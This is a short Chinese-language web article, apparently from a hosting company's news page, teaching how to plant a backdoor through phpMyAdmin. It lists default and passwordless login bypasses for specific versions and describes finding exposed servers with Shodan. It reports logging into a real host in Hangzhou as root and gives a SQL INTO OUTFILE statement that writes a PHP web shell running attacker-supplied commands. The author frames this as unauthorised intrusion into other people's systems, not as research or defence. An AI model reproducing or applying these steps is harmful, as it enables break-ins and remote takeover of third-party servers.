您好,登錄后才能下訂單哦!
本篇文章給大家分享的是有關使用phpMyAdmin怎么通過密碼漏洞留后門文件,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
默認 phpMyAdmin:用戶名 root 密碼 root 或空登陸。
版本 2.11.3~2.11.4:用戶名 'localhost'@'@"
登陸,無需密碼。
版本 2.11.9.2:用戶名 root
登陸,無需密碼。
經測試,第二個漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理從略。
下面讓我們簡單的上網看看能不能找到一些存在這樣漏洞的登陸頁面。
祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。
phpMyAdmin
先看看有沒有不需要密碼登陸的,逐一嘗試沒有后尋找名字中包含的版本號。這里我找到一個國內的(浙江省·杭州市)。
地址已手動打碼。
http://121.***.*.219:80/
登陸成功(root 權限)。
接下來你可以寫一個 outfile 到對方主機的網絡目錄下。俗稱 “留后門”。
SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對路徑"
以上就是使用phpMyAdmin怎么通過密碼漏洞留后門文件,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。